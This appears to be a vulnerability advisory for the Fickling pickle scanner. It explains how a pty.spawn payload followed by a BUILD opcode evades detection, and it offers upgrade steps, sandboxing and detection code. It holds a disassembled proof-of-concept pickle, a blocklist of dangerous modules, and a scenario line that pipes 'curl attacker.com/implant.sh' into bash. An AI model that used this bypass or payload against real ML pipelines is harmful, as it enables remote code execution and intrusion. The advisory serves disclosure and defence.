If your ML pipeline uses Fickling to validate pickle files before loading models, that security gate was bypassable in every release before 0.1.6. A crafted pickle that embeds `pty.spawn()` and appends a single BUILD opcode passes Fickling's checks as `LIKELY_SAFE` while still executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately, and treat any model files from untrusted sources that older versions previously cleared as unvetted.
## Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | < 0.1.6 | 0.1.6 |
If you use fickling at any version below 0.1.6, assume you are affected.
## Severity & Risk
## Recommended Action
1. **Upgrade fickling to >= 0.1.6 immediately.** This release patches both the `pty` blocklist gap (the module was missing from the block list of unsafe module imports) and the BUILD-opcode bypass of the unused-variable heuristic.
2. **Audit all pickle files** from untrusted sources that fickling < 0.1.6 validated since your last upgrade; treat them as unverified and re-scan them.
3. **Add defense in depth.** Sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's `torch.load()` with `weights_only=True` where feasible; enforce allowlist-only module imports at the deserializer level.
4. **Detection.** Grep fickling scan logs for `LIKELY_SAFE` verdicts on files containing `pty` or `spawn` references, or a BUILD opcode following a REDUCE; these are indicators of the bypass pattern.
5. **Supplement Fickling** with static analysis of pickle opcode streams that does not rely solely on heuristic-based tools.
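As a minimal sketch of the sandboxing suggested in step 3 (illustrative only; the function name and loader script are our own, and a real deployment should add OS-level isolation such as containers, seccomp, and blocked network egress), the snippet below deserializes a pickle in a throwaway child process, so any code that runs during unpickling executes outside the parent pipeline process:

```python
import subprocess
import sys

# Loader executed in an isolated child process. Even if the pickle runs
# code on deserialization, it runs here, not in the parent process.
# NOTE: this limits blast radius only; pair it with container/seccomp
# isolation and no network access for real protection.
LOADER = """\
import pickle, sys
with open(sys.argv[1], "rb") as f:
    obj = pickle.load(f)
print(type(obj).__name__)
"""

def load_type_in_subprocess(path: str, timeout: float = 10.0) -> str:
    """Unpickle `path` in a child process and return only the top-level
    type name, never the live object."""
    result = subprocess.run(
        [sys.executable, "-c", LOADER, path],
        capture_output=True, text=True, timeout=timeout,
    )
    if result.returncode != 0:
        raise RuntimeError(f"pickle load failed: {result.stderr.strip()}")
    return result.stdout.strip()
```

Returning only a type name (rather than the deserialized object) is a deliberately conservative design choice for a vetting step; an ingestion pipeline would typically re-serialize validated weights in a safer format instead.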
## Classification

## Compliance Impact

This CVE is relevant to:
## Technical Details

### NVD Description
## Fickling Assessment

Based on the test case provided in the original report below, this bypass was caused by `pty` missing from our block list of unsafe module imports (as previously documented in #108), rather than by the unused variable heuristic. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in https://github.com/trailofbits/fickling/pull/187.

## Original report

### Summary

An unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the "unused variable" heuristic, enabling arbitrary code execution. This bypass is achieved by adding a trivial operation to the pickle file that "uses" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe.

### Details

Fickling relies on the heuristic of detecting unused variables in the VM's stack after execution. Opcodes like `REDUCE`, `OBJ`, and `INST`, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files. This vulnerability enables a bypass by modifying the pickle file to use this leftover variable. A simple way to achieve this is to add a `BUILD` opcode that, in effect, adds a `__setstate__` to the unused variable. This makes Fickling consider the variable "used," thus failing to flag the malicious file.

### PoC

The following is a disassembled view of a malicious pickle file that bypasses Fickling's "unused variable" detection:

```
    0: \x80 PROTO      4
    2: \x95 FRAME      26
   11: \x8c SHORT_BINUNICODE 'pty'
   16: \x94 MEMOIZE    (as 0)
   17: \x8c SHORT_BINUNICODE 'spawn'
   24: \x94 MEMOIZE    (as 1)
   25: \x93 STACK_GLOBAL
   26: \x94 MEMOIZE    (as 2)
   27: \x8c SHORT_BINUNICODE 'id'
   31: \x94 MEMOIZE    (as 3)
   32: \x85 TUPLE1
   33: \x94 MEMOIZE    (as 4)
   34: R    REDUCE
   35: \x94 MEMOIZE    (as 5)
   36: \x8c SHORT_BINUNICODE 'gottem'
   44: \x94 MEMOIZE    (as 6)
   45: b    BUILD
   46: .    STOP
```

Here, the additions to the original pickle file can be seen at offsets 35, 36, 44, and 45. When analyzing this modified file, Fickling fails to identify it as malicious and reports it as **"LIKELY_SAFE"**, as seen here:

```
{
  "severity": "LIKELY_SAFE",
  "analysis": "Warning: Fickling failed to detect any overtly unsafe code, but the pickle file may still be unsafe. Do not unpickle this file if it is from an untrusted source!\n\n",
  "detailed_results": {}
}
```

### Impact

This allows an attacker to craft a malicious pickle file that bypasses Fickling, since it relies on the "unused variable" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
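The REDUCE-then-BUILD pattern described above can also be spotted statically, without ever executing the pickle. The sketch below uses the standard library's `pickletools.genops` to walk the opcode stream; the function name and the deliberately tiny module blocklist are illustrative assumptions, not Fickling's implementation (which, as noted, now blocks `pty` directly):

```python
import pickletools

# Illustrative, deliberately tiny blocklist; production scanners should
# prefer allowlists over blocklists.
SUSPICIOUS_MODULES = {"pty", "os", "posix", "subprocess", "builtins"}

def scan_pickle(data: bytes) -> list[str]:
    """Statically walk the opcode stream and report two indicators of
    this bypass: imports of dangerous modules, and a BUILD that follows
    a code-executing opcode (REDUCE/OBJ/INST)."""
    findings = []
    strings = []            # recent string pushes, used by STACK_GLOBAL
    saw_exec_opcode = False
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        if opcode.name == "GLOBAL":
            module = arg.split(" ")[0]      # genops gives "module name"
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            module = strings[-2]            # module pushed before attr
        else:
            module = None
        if module in SUSPICIOUS_MODULES:
            findings.append(f"import of {module!r} at offset {pos}")
        if opcode.name in ("REDUCE", "OBJ", "INST"):
            saw_exec_opcode = True
        elif opcode.name == "BUILD" and saw_exec_opcode:
            findings.append(f"BUILD after code-executing opcode at offset {pos}")
    return findings
```

Run against bytes equivalent to the PoC above, this reports both the `pty` import and the trailing BUILD; run against an ordinary `pickle.dumps({"a": 1})` it reports nothing.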
## Exploitation Scenario
An attacker targeting an organization's model ingestion pipeline confirms, via job postings or GitHub, that the organization screens models with Fickling. They craft a malicious `.pkl` file that embeds `pty.spawn(['/bin/bash', '-c', 'curl attacker.com/implant.sh | bash'])` via a REDUCE opcode, then append a BUILD opcode with a dummy value to "use" the leftover stack variable, neutralizing Fickling's unused-variable heuristic. The file is submitted to the organization's internal model registry or to a shared community hub the organization pulls from. An automated pipeline or a data scientist downloads and loads the model, triggering arbitrary code execution on the ML training server or serving container and giving the attacker a foothold for lateral movement into broader ML infrastructure, data stores, or secrets managers.